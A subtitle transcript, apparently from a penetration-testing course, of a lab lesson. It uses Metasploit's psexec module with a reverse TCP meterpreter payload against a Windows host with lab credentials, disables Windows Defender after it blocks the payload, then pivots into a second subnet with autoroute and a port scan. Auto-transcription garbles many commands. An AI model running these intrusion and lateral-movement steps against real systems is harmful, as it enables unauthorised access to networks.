1 00:00:00,270 --> 00:00:02,210 Picking up right where we left off. 2 00:00:02,250 --> 00:00:05,200 So let's go ahead and use P.S. Exactly. 3 00:00:05,550 --> 00:00:11,410 So I'm going to say use exploit windows SMB. 4 00:00:11,460 --> 00:00:12,400 P.S. Exactly. 5 00:00:13,170 --> 00:00:17,110 Well say options and then we are going to be at. 6 00:00:17,130 --> 00:00:20,040 I'm actually going to make this full screen just for ease. 7 00:00:20,040 --> 00:00:25,650 We're going to set the R host to 1 9 2 1 6 8 57 seven 41. 8 00:00:25,800 --> 00:00:27,640 That is Frank Castle's machine. 9 00:00:27,750 --> 00:00:38,070 We'll set S&P domain to marvel that local will set SMB pass to password one set SMB user to EF Castle. 10 00:00:39,120 --> 00:00:44,460 So go ahead and get all that typed out if you need to pause at any time if I'm typing too fast. 11 00:00:44,460 --> 00:00:45,820 Just go ahead and pause. 12 00:00:45,960 --> 00:00:52,110 I'm trying to delay just a little bit here but from here let's go ahead and set the payload to windows 13 00:00:52,710 --> 00:00:54,730 and we'll say X 64. 14 00:00:54,780 --> 00:01:05,970 Interpreter and we'll say reverse TCB and then we'll set our host to eat 0 type in options. 15 00:01:07,400 --> 00:01:09,720 And we should have all of our stuff set. 16 00:01:09,710 --> 00:01:14,480 So we've got the correct IP address correct domain password user. 17 00:01:14,480 --> 00:01:15,550 And then we've got the. 18 00:01:15,590 --> 00:01:16,810 Correct. 19 00:01:16,910 --> 00:01:17,920 I'll host here. 20 00:01:17,930 --> 00:01:24,560 So let's set the target to to remember that's the upload file upload we'll go ahead and run this see 21 00:01:24,560 --> 00:01:28,730 if it works hand we got status virus infected. 22 00:01:28,730 --> 00:01:30,400 Good job Windows Defender. 23 00:01:30,500 --> 00:01:31,100 Let's go ahead. 24 00:01:31,100 --> 00:01:34,990 If you're defender kicked on let's go ahead and just turn it off one more time. 25 00:01:35,150 --> 00:01:41,660 So I'm going to do is I'm going to come over here and just go into defender and even though I have the 26 00:01:41,660 --> 00:01:44,650 group policy in here it still comes back on for me it hates me. 27 00:01:44,660 --> 00:01:48,820 So let's go ahead and manage settings in turn off. 28 00:01:48,980 --> 00:01:52,460 Yes let's do this one more time. 29 00:01:52,460 --> 00:01:59,180 So let's go in and run this exploit and now we have a shell. 30 00:01:59,470 --> 00:01:59,820 OK. 31 00:01:59,850 --> 00:02:06,940 So from here what we're going to do is we are going to look at the network. 32 00:02:06,940 --> 00:02:07,800 Let's get a shell. 33 00:02:07,960 --> 00:02:09,390 Let's just talk about this. 34 00:02:09,400 --> 00:02:12,440 This is some post exploitation right. 35 00:02:12,460 --> 00:02:18,220 We want to run a route print and see what the routing is. 36 00:02:18,250 --> 00:02:24,070 On this I always do this and just check and you can see there's ten top ten top ten to zero on here 37 00:02:24,460 --> 00:02:28,180 and the 1 9 2 1 6 8 fifty seven dot zero and the routing table. 38 00:02:28,390 --> 00:02:30,280 So we know that there's two Nicks. 39 00:02:30,280 --> 00:02:35,630 I mean the other way to look at that is just say IP config and look at that right here right. 40 00:02:35,650 --> 00:02:41,020 So when I do six forty seven one forty one ten top ten top ten that one twenty eight we could say our 41 00:02:41,050 --> 00:02:48,630 dash a and see what it's talking to in terms of machines that are out there and we know that 128 exists. 42 00:02:48,640 --> 00:02:52,230 But look it's also talking to one twenty nine. 43 00:02:52,230 --> 00:02:54,930 So we do know that one twenty ninth out there. 44 00:02:54,930 --> 00:02:59,040 So how the heck do we make sure that we can talk to one twenty nine. 45 00:02:59,040 --> 00:03:08,160 Well we're going to pivot here and every time I say this I think of the Friends TV show the whole pivot 46 00:03:08,160 --> 00:03:08,510 scene. 47 00:03:08,520 --> 00:03:09,900 If you never seen that with the couch. 48 00:03:09,900 --> 00:03:11,460 That's what I think about every time. 49 00:03:11,460 --> 00:03:13,620 Go ahead and google ads pretty funny. 50 00:03:13,630 --> 00:03:17,070 I'm going to go ahead and hit control see here and just back out. 51 00:03:17,370 --> 00:03:25,410 And then what we can do from here is we can actually just say run order out and we're just going to 52 00:03:25,410 --> 00:03:31,000 say dash s and this is gonna set up a route for us to this network. 53 00:03:31,020 --> 00:03:37,460 So what we're doing is we're saying hey from the IP that we exploited which was 1 9 2 1 6 8 57 died 54 00:03:37,470 --> 00:03:39,300 0 such 24 network. 55 00:03:39,300 --> 00:03:43,260 Go ahead and make a route from that to this through this machine. 56 00:03:43,260 --> 00:03:44,220 So we're going to do that 57 00:03:46,880 --> 00:03:48,440 and it's going to say it's deprecated. 58 00:03:48,440 --> 00:03:50,760 Don't worry it's it's fine and weird. 59 00:03:50,840 --> 00:04:01,920 Come here we added the route and then now we can say run auto route and then we can say dash P like 60 00:04:01,920 --> 00:04:03,690 it says so lists all active routes. 61 00:04:03,690 --> 00:04:06,390 Make sure that we do have a route here which we do. 62 00:04:06,390 --> 00:04:09,600 The route is going through session one which is appropriate. 63 00:04:09,600 --> 00:04:19,020 Now we can background this and we can come in here and we can do something like search port scan and 64 00:04:19,020 --> 00:04:22,400 we can just say use we'll do five. 65 00:04:22,410 --> 00:04:31,410 We'll do a scan options set our hosts 10 top 10 that turned out one twenty nine and we could do a pink 66 00:04:31,410 --> 00:04:32,840 sweep we could do a lot of things here. 67 00:04:32,850 --> 00:04:38,760 But the proof of concept is that we're just trying to attack this machine or just proved that we are 68 00:04:38,760 --> 00:04:40,800 pivoting into this other network. 69 00:04:40,950 --> 00:04:46,500 So we're going to do as well as we're just going to say I'm going to set the port to I'll just pick 70 00:04:46,500 --> 00:04:52,260 for forty five because we know that's open and we'll just run this and you can see DCP open on 10 dot 71 00:04:52,260 --> 00:04:54,510 10 dot 10 not one twenty nine. 72 00:04:54,510 --> 00:05:01,680 So we have successfully pivoted into this network through this other machine and this is just one example 73 00:05:01,740 --> 00:05:02,820 of pivoting. 74 00:05:02,820 --> 00:05:08,490 But what's important right now is the concept of pivoting you're going to pick this up over time you'll 75 00:05:08,490 --> 00:05:12,960 learn all different kinds of tools and you'll pick up your favorite tool that you like to use to pivot. 76 00:05:13,350 --> 00:05:19,710 But for now just understanding the concept of pivoting and what it means is really important from a 77 00:05:19,710 --> 00:05:23,670 practical level you will encounter this from time to time. 78 00:05:23,760 --> 00:05:29,410 I would say it's not it's not high probability but it doesn't mean that you won't encounter it. 79 00:05:29,650 --> 00:05:35,380 So understanding the concept of what it is and then learning how to do it through tools such as an interpreter 80 00:05:35,620 --> 00:05:41,380 or through something like proxy chains which we won't be covering but you should read up on it's it's 81 00:05:41,440 --> 00:05:47,650 fantastic it's a good topic to learn about and again that tool is proxy change if you're curious you 82 00:05:47,650 --> 00:05:53,560 can utilize pivoting through a few different ways not just Metis boy but you can use SS age pivoting 83 00:05:53,560 --> 00:05:54,010 as well. 84 00:05:54,040 --> 00:05:59,260 SS age is open on the box and there's different tools that will do a lot of the same thing so I encourage 85 00:05:59,260 --> 00:06:01,020 you to read up on the topic. 86 00:06:01,300 --> 00:06:02,980 And from here that's it. 87 00:06:02,980 --> 00:06:06,640 We're gonna go ahead and move into cleanup and then we'll wrap up the networking section.